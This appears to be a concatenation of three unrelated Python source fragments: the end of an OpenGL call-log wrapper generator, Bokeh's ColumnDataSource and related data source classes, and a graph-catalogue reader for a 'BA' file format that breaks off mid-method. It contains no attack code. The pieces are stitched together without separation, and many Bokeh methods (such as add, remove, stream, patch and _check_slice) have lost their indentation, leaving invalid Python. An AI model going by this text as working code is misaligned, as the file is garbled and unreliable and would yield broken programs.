"glVertexAttribI4ubv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribI4usv": LogSpec({1: pointer(size = "4")}),
"glVertexAttribPointer": LogSpec({2: enum("Type")}),
"glVertexAttribIPointer": LogSpec({2: enum("Type")}),
"glVertexAttribFormat": LogSpec({2: enum("Type")}),
"glVertexAttribIFormat": LogSpec({2: enum("Type")}),
"glInvalidateFramebuffer": LogSpec({0: enum("FramebufferTarget"), 2: enumPointer("InvalidateAttachment", "numAttachments")}),
"glInvalidateSubFramebuffer": LogSpec({0: enum("FramebufferTarget"), 2: enumPointer("InvalidateAttachment", "numAttachments")}),
"glMapBufferRange": LogSpec({0: enum("BufferTarget"), 3: enum("BufferMapFlags")}),
"glUnmapBuffer": LogSpec({0: enum("BufferTarget")}),
"glFlushMappedBufferRange": LogSpec({0: enum("BufferTarget")}),
"glMemoryBarrier": LogSpec({0: enum("MemoryBarrierFlags")}),
"glBindImageTexture": LogSpec({5: enum("ImageAccess"), 6: enum("UncompressedTextureFormat")}),
"glGetProgramResourceIndex": LogSpec({1: enum("ProgramInterface")}),
"glGetProgramResourceiv":
LogSpec(
{
1: enum("ProgramInterface"),
4: enumPointer("ProgramResourceProperty", "propCount")
},
argOutPrints =
{
6: pointer(size = "1"),
7: pointer(size = "((length == DE_NULL) ? (bufSize) : ((bufSize < *length) ? (bufSize) : (*length)))")
}),
"glDebugMessageInsert": LogSpec({0: enum("DebugMessageSource"), 1: enum("DebugMessageType"), 3: enum("DebugMessageSeverity")}),
"glDebugMessageControl": LogSpec({0: enum("DebugMessageSource"), 1: enum("DebugMessageType"), 2: enum("DebugMessageSeverity"), 4: pointer(size = "(count)")}),
"glDebugMessageCallback": LogSpec({0: fnPointer, 1: voidPointer}),
"glPushDebugGroup": LogSpec({0: enum("DebugMessageSource")}),
"glTexBuffer": LogSpec({0: enum("BufferTarget"), 1: enum("UncompressedTextureFormat")}),
"glTexBufferRange": LogSpec({0: enum("BufferTarget"), 1: enum("UncompressedTextureFormat")}),
}
def glwPrefix (string):
    """Prepend the glw:: namespace to every GL-prefixed identifier in *string*."""
    pattern = re.compile(r'\bGL')
    return pattern.sub('glw::GL', string)
def prefixedParams (command):
    """Render the C parameter list for *command*, glw::-prefixing GL type names.

    Returns the literal string "void" for a command with no parameters.
    """
    if not command.params:
        return "void"
    declarations = [glwPrefix(p.declaration) for p in command.params]
    return ", ".join(declarations)
def commandLogWrapperMemberDecl (command):
    """Produce one tab-separated CallLogWrapper member declaration line for *command*."""
    returnType = glwPrefix(command.type)
    paramList = prefixedParams(command)
    return "{}\t{}\t({});".format(returnType, command.name, paramList)
def getVarDefaultPrint (type, varName):
    """Return a C++ expression that pretty-prints *varName* of C type *type*.

    Strings get getStringStr(), small integer/bitfield types get toHex(),
    booleans get getBooleanStr(), non-void pointers get a hex-printed
    address, and everything else is printed verbatim.
    """
    if re.match(r'^const +GLchar *\*$', type):
        return "getStringStr(%s)" % varName
    if re.match(r'(GLubyte|GLbyte|GLenum|GLushort|GLbitfield|\*)$', type):
        return "toHex(%s)" % varName
    if type == 'GLboolean':
        return "getBooleanStr(%s)" % varName
    isPointer = re.match(r'^(const +)?.+ *\*$', type)
    isVoidPointer = re.match(r'^(const +)?void *\*$', type)
    if isPointer and not isVoidPointer:
        # non-void pointer type, always cast to void* to avoid unforeseen consequences of
        # implicit assumptions (such as char* should be printed as a zero-terminated string)
        # \note use static_cast to break the build if function pointer is supplied
        return "toHex(reinterpret_cast<deUintptr>(static_cast<const void*>(%s)))" % varName
    return varName
def commandLogWrapperMemberDef (command):
    """Generate the C++ definition of a CallLogWrapper member function for *command*.

    The generated body logs the call with all arguments (using per-argument
    print overrides from CALL_LOG_SPECS when present), forwards the call to
    the m_gl function table, optionally logs values returned through pointer
    arguments, and for non-void commands logs and returns the return value.
    """
    src = ""
    try:
        logSpec = CALL_LOG_SPECS[command.name]
    except KeyError:
        # No special spec: every argument falls back to default printing.
        logSpec = None
    src += "\n"
    src += "%s CallLogWrapper::%s (%s)\n{\n" % (glwPrefix(command.type), command.name, prefixedParams(command))
    # Append parameters
    callPrintItems = ["\"%s(\"" % command.name]
    for paramNdx, param in enumerate(command.params):
        if paramNdx > 0:
            callPrintItems.append("\", \"")
        if logSpec and paramNdx in logSpec.argInPrints:
            # Custom input-argument printer from the log spec.
            callPrintItems.append(logSpec.argInPrints[paramNdx](param.name))
        else:
            callPrintItems.append(getVarDefaultPrint(param.type, param.name))
    callPrintItems += ["\");\"", "TestLog::EndMessage"]
    src += "\tif (m_enableLog)\n"
    src += "\t\tm_log << TestLog::Message << %s;\n" % " << ".join(callPrintItems)
    callStr = "m_gl.%s(%s)" % (getFunctionMemberName(command.name), ", ".join([p.name for p in command.params]))
    isVoid = command.type == 'void'
    if isVoid:
        src += "\t%s;\n" % callStr
    else:
        src += "\t%s returnValue = %s;\n" % (glwPrefix(command.type), callStr)
    if logSpec and len(logSpec.argOutPrints) > 0:
        # Print values returned in pointers
        src += "\tif (m_enableLog)\n"
        printouts = ""
        numPrintouts = 0
        for paramNdx, param in enumerate(command.params):
            if paramNdx in logSpec.argOutPrints:
                printouts += "\t\tm_log << TestLog::Message << \"// %s = \" << %s << TestLog::EndMessage;\n" % (param.name, logSpec.argOutPrints[paramNdx](param.name))
                numPrintouts += 1
        # If print handlers do not match the actual command, that is very likely an error. Check
        # print handlers is a subset of all arguments.
        if numPrintouts == 0 or len(set(logSpec.argOutPrints.keys()) - set(range(len(command.params)))) > 0:
            raise Exception("Invalid print handlers when processing command %s" % command.name)
        # Multiple printouts need a brace block so they all fall under the if.
        if numPrintouts != 1:
            src += "\t{\n"
        src += printouts
        if numPrintouts != 1:
            src += "\t}\n"
    if not isVoid:
        # Print return value
        returnPrint = getVarDefaultPrint(command.type, "returnValue")
        if logSpec and logSpec.returnPrint:
            returnPrint = logSpec.returnPrint("returnValue")
        src += "\tif (m_enableLog)\n"
        src += "\t\tm_log << TestLog::Message << \"// \" << %s << \" returned\" << TestLog::EndMessage;\n" % returnPrint
        src += "\treturn returnValue;\n"
    src += "}"
    return src
def genCallLogWrapper (iface):
    # Generate both CallLogWrapper .inl files: the member declarations and
    # the member definitions, for all commands in the interface.
    genCommandList(iface, commandLogWrapperMemberDecl, OPENGL_DIR, "gluCallLogWrapperApi.inl", True)
    genCommandList(iface, commandLogWrapperMemberDef, OPENGL_DIR, "gluCallLogWrapper.inl", False)
if __name__ == "__main__":
    # Script entry point: generate the wrapper files for the hybrid interface.
    genCallLogWrapper(getHybridInterface())
| |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import warnings
# External imports
# Bokeh imports
from ..core.has_props import abstract
from ..core.properties import Any, Bool, ColumnData, Dict, Enum, Instance, Int, JSON, List, PandasDataFrame, PandasGroupBy, Seq, String
from ..model import Model
from ..util.dependencies import import_optional
from ..util.serialization import convert_datetime_array
from ..util.warnings import BokehUserWarning
from .callbacks import Callback, CustomJS
from .filters import Filter
from .selections import Selection, SelectionPolicy, UnionRenderers
pd = import_optional('pandas')
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
# Explicit public API of this module (some names are defined further down
# in the file, outside this excerpt).
__all__ = (
    'ServerSentDataSource',
    'AjaxDataSource',
    'CDSView',
    'ColumnarDataSource',
    'ColumnDataSource',
    'DataSource',
    'GeoJSONDataSource',
    'RemoteSource',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@abstract
class DataSource(Model):
    ''' A base class for data source types.

    '''

    # Selection state shared by every renderer driven by this source.
    selected = Instance(Selection, default=lambda: Selection(), help="""
    A Selection that indicates selected indices on this ``DataSource``.
    """)

    # Legacy browser-side hook; superseded by selected.js_on_change(...).
    callback = Instance(Callback, help="""
    A callback to run in the browser whenever the selection is changed.

    .. note:
        This property is left for backwards compatibility, but may be deprecated
        in the future. Prefer ``source.selected.js_on_change(...)`` for new code.
    """)
@abstract
class ColumnarDataSource(DataSource):
    ''' A base class for data source types, which can be mapped onto
    a columnar format.

    '''

    # How selections from multiple renderers sharing this source are
    # combined (union of renderers by default).
    selection_policy = Instance(SelectionPolicy, default=lambda: UnionRenderers(), help="""
    An instance of a ``SelectionPolicy`` that determines how selections are set.
    """)
class ColumnDataSource(ColumnarDataSource):
    ''' Maps names of columns to sequences or arrays.

    The ``ColumnDataSource`` is a fundamental data structure of Bokeh. Most
    plots, data tables, etc. will be driven by a ``ColumnDataSource``.

    If the ``ColumnDataSource`` initializer is called with a single argument that
    can be any of the following:

    * A Python ``dict`` that maps string names to sequences of values, e.g.
      lists, arrays, etc.

      .. code-block:: python

          data = {'x': [1,2,3,4], 'y': np.ndarray([10.0, 20.0, 30.0, 40.0])}

          source = ColumnDataSource(data)

    .. note::
        ``ColumnDataSource`` only creates a shallow copy of ``data``. Use e.g.
        ``ColumnDataSource(copy.deepcopy(data))`` if initializing from another
        ``ColumnDataSource.data`` object that you want to keep independent.

    * A Pandas ``DataFrame`` object

      .. code-block:: python

          source = ColumnDataSource(df)

      In this case the CDS will have columns corresponding to the columns of
      the ``DataFrame``. If the ``DataFrame`` columns have multiple levels,
      they will be flattened using an underscore (e.g. level_0_col_level_1_col).
      The index of the ``DataFrame`` will be flattened to an ``Index`` of tuples
      if it's a ``MultiIndex``, and then reset using ``reset_index``. The result
      will be a column with the same name if the index was named, or
      level_0_name_level_1_name if it was a named ``MultiIndex``. If the
      ``Index`` did not have a name or the ``MultiIndex`` name could not be
      flattened/determined, the ``reset_index`` function will name the index column
      ``index``, or ``level_0`` if the name ``index`` is not available.

    * A Pandas ``GroupBy`` object

      .. code-block:: python

          group = df.groupby(('colA', 'ColB'))

      In this case the CDS will have columns corresponding to the result of
      calling ``group.describe()``. The ``describe`` method generates columns
      for statistical measures such as ``mean`` and ``count`` for all the
      non-grouped original columns. The CDS columns are formed by joining
      original column names with the computed measure. For example, if a
      ``DataFrame`` has columns ``'year'`` and ``'mpg'``. Then passing
      ``df.groupby('year')`` to a CDS will result in columns such as
      ``'mpg_mean'``

      If the ``GroupBy.describe`` result has a named index column, then
      CDS will also have a column with this name. However, if the index name
      (or any subname of a ``MultiIndex``) is ``None``, then the CDS will have
      a column generically named ``index`` for the index.

      Note this capability to adapt ``GroupBy`` objects may only work with
      Pandas ``>=0.20.0``.

    .. note::
        There is an implicit assumption that all the columns in a given
        ``ColumnDataSource`` all have the same length at all times. For this
        reason, it is usually preferable to update the ``.data`` property
        of a data source "all at once".

    '''

    # The central column mapping. Assignment also accepts DataFrame/GroupBy
    # values (converted through the static helpers below), and a length
    # mismatch between columns triggers a BokehUserWarning rather than an
    # error.
    data = ColumnData(String, Seq(Any), help="""
    Mapping of column names to sequences of data. The columns can be, e.g,
    Python lists or tuples, NumPy arrays, etc.

    The .data attribute can also be set from Pandas DataFrames or GroupBy
    objects. In these cases, the behaviour is identical to passing the objects
    to the ``ColumnDataSource`` initializer.
    """).accepts(
        PandasDataFrame, lambda x: ColumnDataSource._data_from_df(x)
    ).accepts(
        PandasGroupBy, lambda x: ColumnDataSource._data_from_groupby(x)
    ).asserts(lambda _, data: len(set(len(x) for x in data.values())) <= 1,
              lambda obj, name, data: warnings.warn(
                  "ColumnDataSource's columns must be of the same length. " +
                  "Current lengths: %s" % ", ".join(sorted(str((k, len(v))) for k, v in data.items())), BokehUserWarning))
    def __init__(self, *args, **kw):
        ''' If called with a single argument that is a dict or
        ``pandas.DataFrame``, treat that implicitly as the "data" attribute.

        '''
        # A lone positional argument is shorthand for data=...
        if len(args) == 1 and "data" not in kw:
            kw["data"] = args[0]

        # TODO (bev) invalid to pass args and "data", check and raise exception
        raw_data = kw.pop("data", {})

        # Normalize DataFrame / GroupBy input to a plain dict of columns
        # before the remaining kwargs are passed to the base class.
        if not isinstance(raw_data, dict):
            if pd and isinstance(raw_data, pd.DataFrame):
                raw_data = self._data_from_df(raw_data)
            elif pd and isinstance(raw_data, pd.core.groupby.GroupBy):
                raw_data = self._data_from_groupby(raw_data)
            else:
                raise ValueError("expected a dict or pandas.DataFrame, got %s" % raw_data)
        super(ColumnDataSource, self).__init__(**kw)
        # NOTE(review): the already-normalized dict is merged with update()
        # rather than assigned -- presumably to avoid re-running the property
        # conversion machinery; confirm before changing.
        self.data.update(raw_data)
@property
def column_names(self):
''' A list of the column names in this data source.
'''
return list(self.data)
    @staticmethod
    def _data_from_df(df):
        ''' Create a ``dict`` of columns from a Pandas ``DataFrame``,
        suitable for creating a ColumnDataSource.

        Args:
            df (DataFrame) : data to convert

        Returns:
            dict[str, np.array]

        '''
        # Work on a copy so the caller's DataFrame is never mutated.
        _df = df.copy()

        # Flatten columns
        if isinstance(df.columns, pd.MultiIndex):
            try:
                _df.columns = ['_'.join(col) for col in _df.columns.values]
            except TypeError:
                # join() fails when a level label is not a string.
                raise TypeError('Could not flatten MultiIndex columns. '
                                'use string column names or flatten manually')
        # Transform columns CategoricalIndex in list
        if isinstance(df.columns, pd.CategoricalIndex):
            _df.columns = df.columns.tolist()
        # Flatten index
        index_name = ColumnDataSource._df_index_name(df)
        if index_name == 'index':
            # Unnamed fallback: let reset_index pick "index"/"level_0".
            _df.index = pd.Index(_df.index.values)
        else:
            _df.index = pd.Index(_df.index.values, name=index_name)
        _df.reset_index(inplace=True)

        # NOTE(review): DataFrame.iteritems was removed in pandas 2.0 (use
        # .items() there); this code targets older pandas -- confirm before
        # upgrading the pandas dependency.
        tmp_data = {c: v.values for c, v in _df.iteritems()}

        new_data = {}
        for k, v in tmp_data.items():
            new_data[k] = v

        return new_data
@staticmethod
def _data_from_groupby(group):
''' Create a ``dict`` of columns from a Pandas ``GroupBy``,
suitable for creating a ``ColumnDataSource``.
The data generated is the result of running ``describe``
on the group.
Args:
group (GroupBy) : data to convert
Returns:
dict[str, np.array]
'''
return ColumnDataSource._data_from_df(group.describe())
@staticmethod
def _df_index_name(df):
''' Return the Bokeh-appropriate column name for a ``DataFrame`` index
If there is no named index, then `"index" is returned.
If there is a single named index, then ``df.index.name`` is returned.
If there is a multi-index, and the index names are all strings, then
the names are joined with '_' and the result is returned, e.g. for a
multi-index ``['ind1', 'ind2']`` the result will be "ind1_ind2".
Otherwise if any index name is not a string, the fallback name "index"
is returned.
Args:
df (DataFrame) : the ``DataFrame`` to find an index name for
Returns:
str
'''
if df.index.name:
return df.index.name
elif df.index.names:
try:
return "_".join(df.index.names)
except TypeError:
return "index"
else:
return "index"
@classmethod
def from_df(cls, data):
''' Create a ``dict`` of columns from a Pandas ``DataFrame``,
suitable for creating a ``ColumnDataSource``.
Args:
data (DataFrame) : data to convert
Returns:
dict[str, np.array]
'''
return cls._data_from_df(data)
@classmethod
def from_groupby(cls, data):
''' Create a ``dict`` of columns from a Pandas ``GroupBy``,
suitable for creating a ``ColumnDataSource``.
The data generated is the result of running ``describe``
on the group.
Args:
data (Groupby) : data to convert
Returns:
dict[str, np.array]
'''
return cls._data_from_df(data.describe())
def to_df(self):
''' Convert this data source to pandas ``DataFrame``.
Returns:
DataFrame
'''
if not pd:
raise RuntimeError('Pandas must be installed to convert to a Pandas Dataframe')
return pd.DataFrame(self.data)
def add(self, data, name=None):
''' Appends a new column of data to the data source.
Args:
data (seq) : new data to add
name (str, optional) : column name to use.
If not supplied, generate a name of the form "Series ####"
Returns:
str: the column name used
'''
if name is None:
n = len(self.data)
while "Series %d"%n in self.data:
n += 1
name = "Series %d"%n
self.data[name] = data
return name
def remove(self, name):
''' Remove a column of data.
Args:
name (str) : name of the column to remove
Returns:
None
.. note::
If the column name does not exist, a warning is issued.
'''
try:
del self.data[name]
except (ValueError, KeyError):
import warnings
warnings.warn("Unable to find column '%s' in data source" % name)
def stream(self, new_data, rollover=None):
''' Efficiently update data source columns with new append-only data.
In cases where it is necessary to update data columns in, this method
can efficiently send only the new data, instead of requiring the
entire data set to be re-sent.
Args:
new_data (dict[str, seq]) : a mapping of column names to sequences of
new data to append to each column.
All columns of the data source must be present in ``new_data``,
with identical-length append data.
rollover (int, optional) : A maximum column size, above which data
from the start of the column begins to be discarded. If None,
then columns will continue to grow unbounded (default: None)
Returns:
None
Raises:
ValueError
Example:
.. code-block:: python
source = ColumnDataSource(data=dict(foo=[], bar=[]))
# has new, identical-length updates for all columns in source
new_data = {
'foo' : [10, 20],
'bar' : [100, 200],
}
source.stream(new_data)
'''
# calls internal implementation
self._stream(new_data, rollover)
    def _stream(self, new_data, rollover=None, setter=None):
        ''' Internal implementation to efficiently update data source columns
        with new append-only data. The internal implementation adds the setter
        attribute. [https://github.com/bokeh/bokeh/issues/6577]

        Args:
            new_data (dict[str, seq] or DataFrame or Series) : a mapping of
                column names to sequences of new data to append to each column,
                a pandas DataFrame, or a pandas Series in case of a single row -
                in this case the Series index is used as column names

                All columns of the data source must be present in ``new_data``,
                with identical-length append data.

            rollover (int, optional) : A maximum column size, above which data
                from the start of the column begins to be discarded. If None,
                then columns will continue to grow unbounded (default: None)

            setter (ClientSession or ServerSession or None, optional) :
                This is used to prevent "boomerang" updates to Bokeh apps.
                (default: None)

        Returns:
            None

        Raises:
            ValueError

        '''
        needs_length_check = True

        if pd and isinstance(new_data, pd.Series):
            # A single row: promote to a one-row DataFrame so the Series
            # index becomes the column names.
            new_data = new_data.to_frame().T

        if pd and isinstance(new_data, pd.DataFrame):
            needs_length_check = False # DataFrame lengths equal by definition
            _df = new_data
            newkeys = set(_df.columns)
            index_name = ColumnDataSource._df_index_name(_df)
            newkeys.add(index_name)
            # NOTE(review): iteritems was removed in pandas 2.0; this targets
            # older pandas -- confirm before upgrading.
            new_data = dict(_df.iteritems())
            new_data[index_name] = _df.index.values
        else:
            newkeys = set(new_data.keys())

        oldkeys = set(self.data.keys())

        # The streamed keys must exactly match the existing columns; report
        # missing and extra names as precisely as possible.
        if newkeys != oldkeys:
            missing = oldkeys - newkeys
            extra = newkeys - oldkeys
            if missing and extra:
                raise ValueError(
                    "Must stream updates to all existing columns (missing: %s, extra: %s)" % (", ".join(sorted(missing)), ", ".join(sorted(extra)))
                )
            elif missing:
                raise ValueError("Must stream updates to all existing columns (missing: %s)" % ", ".join(sorted(missing)))
            else:
                raise ValueError("Must stream updates to all existing columns (extra: %s)" % ", ".join(sorted(extra)))

        import numpy as np
        if needs_length_check:
            # All appended columns must have the same length; arrays must
            # additionally be one-dimensional.
            lengths = set()
            arr_types = (np.ndarray, pd.Series) if pd else np.ndarray
            for k, x in new_data.items():
                if isinstance(x, arr_types):
                    if len(x.shape) != 1:
                        raise ValueError("stream(...) only supports 1d sequences, got ndarray with size %r" % (x.shape,))
                    lengths.add(x.shape[0])
                else:
                    lengths.add(len(x))

            if len(lengths) > 1:
                raise ValueError("All streaming column updates must be the same length")

        # slightly awkward that we have to call convert_datetime_array here ourselves
        # but the downstream code expects things to already be ms-since-epoch
        for key, values in new_data.items():
            if pd and isinstance(values, (pd.Series, pd.Index)):
                values = values.values
            old_values = self.data[key]
            # Apply the transformation if the new data contains datetimes
            # but the current data has already been transformed
            if (isinstance(values, np.ndarray) and values.dtype.kind.lower() == 'm' and
                    isinstance(old_values, np.ndarray) and old_values.dtype.kind.lower() != 'm'):
                new_data[key] = convert_datetime_array(values)
            else:
                new_data[key] = values

        self.data._stream(self.document, self, new_data, rollover, setter)
def patch(self, patches, setter=None):
''' Efficiently update data source columns at specific locations
If it is only necessary to update a small subset of data in a
``ColumnDataSource``, this method can be used to efficiently update only
the subset, instead of requiring the entire data set to be sent.
This method should be passed a dictionary that maps column names to
lists of tuples that describe a patch change to apply. To replace
individual items in columns entirely, the tuples should be of the
form:
.. code-block:: python
(index, new_value) # replace a single column value
# or
(slice, new_values) # replace several column values
Values at an index or slice will be replaced with the corresponding
new values.
In the case of columns whose values are other arrays or lists, (e.g.
image or patches glyphs), it is also possible to patch "subregions".
In this case the first item of the tuple should be a whose first
element is the index of the array item in the CDS patch, and whose
subsequent elements are integer indices or slices into the array item:
.. code-block:: python
# replace the entire 10th column of the 2nd array:
+----------------- index of item in column data source
|
| +--------- row subindex into array item
| |
| | +- column subindex into array item
V V V
([2, slice(None), 10], new_values)
Imagining a list of 2d NumPy arrays, the patch above is roughly
equivalent to:
.. code-block:: python
data = [arr1, arr2, ...] # list of 2d arrays
data[2][:, 10] = new_data
There are some limitations to the kinds of slices and data that can
be accepted.
* Negative ``start``, ``stop``, or ``step`` values for slices will
result in a ``ValueError``.
* In a slice, ``start > stop`` will result in a ``ValueError``
* When patching 1d or 2d subitems, the subitems must be NumPy arrays.
* New values must be supplied as a **flattened one-dimensional array**
of the appropriate size.
Args:
patches (dict[str, list[tuple]]) : lists of patches for each column
Returns:
None
Raises:
ValueError
Example:
The following example shows how to patch entire column elements. In this case,
.. code-block:: python
source = ColumnDataSource(data=dict(foo=[10, 20, 30], bar=[100, 200, 300]))
patches = {
'foo' : [ (slice(2), [11, 12]) ],
'bar' : [ (0, 101), (2, 301) ],
}
source.patch(patches)
After this operation, the value of the ``source.data`` will be:
.. code-block:: python
dict(foo=[11, 12, 30], bar=[101, 200, 301])
For a more comprehensive complete example, see :bokeh-tree:`examples/howto/patch_app.py`.
'''
import numpy as np
extra = set(patches.keys()) - set(self.data.keys())
if extra:
raise ValueError("Can only patch existing columns (extra: %s)" % ", ".join(sorted(extra)))
for name, patch in patches.items():
col_len = len(self.data[name])
for ind, value in patch:
# integer index, patch single value of 1d column
if isinstance(ind, int):
if ind > col_len or ind < 0:
raise ValueError("Out-of bounds index (%d) in patch for column: %s" % (ind, name))
# slice index, patch multiple values of 1d column
elif isinstance(ind, slice):
_check_slice(ind)
if ind.stop is not None and ind.stop > col_len:
raise ValueError("Out-of bounds slice index stop (%d) in patch for column: %s" % (ind.stop, name))
# multi-index, patch sub-regions of "n-d" column
elif isinstance(ind, (list, tuple)):
if len(ind) == 0:
raise ValueError("Empty (length zero) patch multi-index")
if len(ind) == 1:
raise ValueError("Patch multi-index must contain more than one subindex")
if not isinstance(ind[0], int):
raise ValueError("Initial patch sub-index may only be integer, got: %s" % ind[0])
if ind[0] > col_len or ind[0] < 0:
raise ValueError("Out-of bounds initial sub-index (%d) in patch for column: %s" % (ind, name))
if not isinstance(self.data[name][ind[0]], np.ndarray):
raise ValueError("Can only sub-patch into columns with NumPy array items")
if len(self.data[name][ind[0]].shape) != (len(ind)-1):
raise ValueError("Shape mismatch between patch slice and sliced data")
elif isinstance(ind[0], slice):
_check_slice(ind[0])
if ind[0].stop is not None and ind[0].stop > col_len:
raise ValueError("Out-of bounds initial slice sub-index stop (%d) in patch for column: %s" % (ind.stop, name))
# Note: bounds of sub-indices after the first are not checked!
for subind in ind[1:]:
if not isinstance(subind, (int, slice)):
raise ValueError("Invalid patch sub-index: %s" % subind)
if isinstance(subind, slice):
_check_slice(subind)
else:
raise ValueError("Invalid patch index: %s" % ind)
self.data._patch(self.document, self, patches, setter)
class CDSView(Model):
    ''' A view into a ``ColumnDataSource`` that represents a row-wise subset.

    '''

    # The row subset is defined by applying every filter in this list.
    filters = List(Instance(Filter), default=[], help="""
    List of filters that the view comprises.
    """)

    source = Instance(ColumnarDataSource, help="""
    The ``ColumnDataSource`` associated with this view. Used to determine
    the length of the columns.
    """)
class GeoJSONDataSource(ColumnarDataSource):
    ''' A columnar data source that consumes GeoJSON.

    '''

    geojson = JSON(help="""
    GeoJSON that contains features for plotting. Currently
    ``GeoJSONDataSource`` can only process a ``FeatureCollection`` or
    ``GeometryCollection``.
    """)
@abstract
class WebSource(ColumnDataSource):
    ''' Base class for web column data sources that can update from data
    URLs.

    .. note::
        This base class is typically not useful to instantiate on its own.

    '''

    adapter = Instance(CustomJS, help="""
    A JavaScript callback to adapt raw JSON responses to Bokeh ``ColumnDataSource``
    format.

    If provided, this callback is executed immediately after the JSON data is
    received, but before appending or replacing data in the data source. The
    ``CustomJS`` callback will receive the ``AjaxDataSource`` as ``cb_obj`` and
    will receive the raw JSON response as ``cb_data.response``. The callback
    code should return a ``data`` object suitable for a Bokeh ``ColumnDataSource``
    (i.e. a mapping of string column names to arrays of data).
    """)

    max_size = Int(help="""
    Maximum size of the data columns. If a new fetch would result in columns
    larger than ``max_size``, then earlier data is dropped to make room.
    """)

    mode = Enum("replace", "append", help="""
    Whether to append new data to existing data (up to ``max_size``), or to
    replace existing data entirely.
    """)

    data_url = String(help="""
    A URL to fetch data from.
    """)
@abstract
class RemoteSource(WebSource):
    ''' Base class for remote column data sources that can update from data
    URLs at prescribed time intervals.

    .. note::
        This base class is typically not useful to instantiate on its own.

    '''

    # Subclasses re-fetch ``data_url`` every ``polling_interval`` milliseconds.
    polling_interval = Int(help="""
    A polling interval (in milliseconds) for updating data source.
    """)
class ServerSentDataSource(WebSource):
    ''' A data source that can populate columns by receiving data from
    Server-Sent Events (SSE) endpoints.

    '''
class AjaxDataSource(RemoteSource):
    ''' A data source that can populate columns by making Ajax calls to REST
    endpoints.

    The ``AjaxDataSource`` can be especially useful if you want to make a
    standalone document (i.e. not backed by the Bokeh server) that can still
    dynamically update using an existing REST API.

    The response from the REST API should match the ``.data`` property of a
    standard ``ColumnDataSource``, i.e. a JSON dict that maps names to arrays
    of values:

    .. code-block:: python

        {
            'x' : [1, 2, 3, ...],
            'y' : [9, 3, 2, ...]
        }

    Alternatively, if the REST API returns a different format, a ``CustomJS``
    callback can be provided to convert the REST response into Bokeh format,
    via the ``adapter`` property of this data source.

    A full example can be seen at :bokeh-tree:`examples/howto/ajax_source.py`

    '''

    method = Enum('POST', 'GET', help="""
    Specify the HTTP method to use for the Ajax request (GET or POST)
    """)

    if_modified = Bool(False, help="""
    Whether to include an ``If-Modified-Since`` header in Ajax requests
    to the server. If this header is supported by the server, then only
    new data since the last request will be returned.
    """)

    content_type = String(default='application/json', help="""
    Set the "contentType" parameter for the Ajax request.
    """)

    http_headers = Dict(String, String, help="""
    Specify HTTP headers to set for the Ajax request.

    Example:

    .. code-block:: python

        ajax_source.http_headers = { 'x-my-custom-header': 'some value' }

    """)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _check_slice(s):
if (s.start is not None and s.stop is not None and s.start > s.stop):
raise ValueError("Patch slices must have start < end, got %s" % s)
if (s.start is not None and s.start < 0) or \
(s.stop is not None and s.stop < 0) or \
(s.step is not None and s.step < 0):
raise ValueError("Patch slices must have non-negative (start, stop, step) values, got %s" % s)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| |
from os.path import abspath, expanduser, isfile, dirname, isdir, basename, join, splitext
import networkx as nx
import re
import tempfile
from time import asctime
from snarkx.io import ParseFileError
__all__ = ['GraphReaderBA', 'GraphWriterBA']
class GraphReaderBA(object):
    """Sequential reader for graph catalogues stored in the `BA` text format.

    The file header announces the number of graphs; each graph record is its
    1-based index, its order, and one adjacency line per vertex.  Iterating
    over an instance yields ``networkx.Graph`` objects.
    """

    def __init__(self, path):
        # print('DEBUG ReaderBA, file: {}'.format(path))
        if path is None:
            raise ValueError('`None` not allowed.')
        self._filepath = abspath(expanduser(path))
        if not isfile(self._filepath):
            raise FileNotFoundError('`{}`'.format(self._filepath))  # ('File not found: `{}`'.format(self._filepath))
        self._actual_index = -1  # actual index of the graph
        self._stream = open(self._filepath, 'r', encoding='ascii')  # graph file to be read
        self._no_graphs = -1  # number of graphs in the catalogue
        self._line_no = 0  # current line, for error reporting
        # Scan the header: skip comments/metadata until the graph count is found.
        try:
            for _line in self._stream:
                self._line_no += 1
                _line = re.sub(r'\{.*\}', '', _line)
                # FIXME: metadata read from the graph file is completely ignored for now
                _line = _line.strip()
                if len(_line) == 0 or _line[0] == '#':
                    continue
                # we got rid of remarks '{...}', one-line comments '#...', and metadata '{%... }'
                # expecting one integer at the line
                try:
                    found = [int(_num) for _num in re.findall(r'^\d+', _line)]
                except ValueError:
                    self._stream.close()
                    raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
                if len(found) == 1:
                    self._no_graphs = found[0]
                    break
                else:  # several integers @ line :: fault
                    self._stream.close()
                    raise ParseFileError('Syntax error `{0}` @ {1}'.format(self._filepath, self._line_no))
        except UnicodeDecodeError:
            # Non-ASCII bytes: almost certainly not a BA file.
            raise IOError("File '{0}' not likely in `BA` format.".format(self._filepath))

    @classmethod
    def kind(cls):
        # Short identifier of the on-disk format this reader handles.
        return 'ba'

    def close(self):
        # Idempotent; safe even if __init__ failed before opening the stream.
        if hasattr(self, '_stream') and not self._stream.closed:
            self._stream.close()

    def __len__(self):
        # Number of graphs announced by the file header.
        return self._no_graphs

    def __del__(self):
        self.close()

    def __iter__(self):
        # Graph records in the file are indexed starting at 1.
        self._actual_index = 1
        self._last_read = 0
        return self

    def __next__(self):
        """Parse and return the next graph; raise StopIteration at the end.

        Parser states: 1 = expect the graph's index, 2 = expect its order,
        3 = expect one adjacency line per vertex.
        """
        _order = -1
        _state = 1
        _vertex_no = 0
        _gph = nx.Graph()
        if self._actual_index > self._no_graphs:
            self._stream.close()
            raise StopIteration
        some_line_read = False
        for _line in self._stream:
            some_line_read = True
            self._line_no += 1
            _line = re.sub(r'\{.*\}', '', _line)  # remove comments :: {}, including metadata comments
            # TODO: deal with metadata, in format {% key : value }
            _line = _line.strip()
            if len(_line) == 0 or _line[0] == '#':  # the former is deprecated, left for compatibility?
                continue
            if _state < 3:  # expecting graph number or its order
                try:
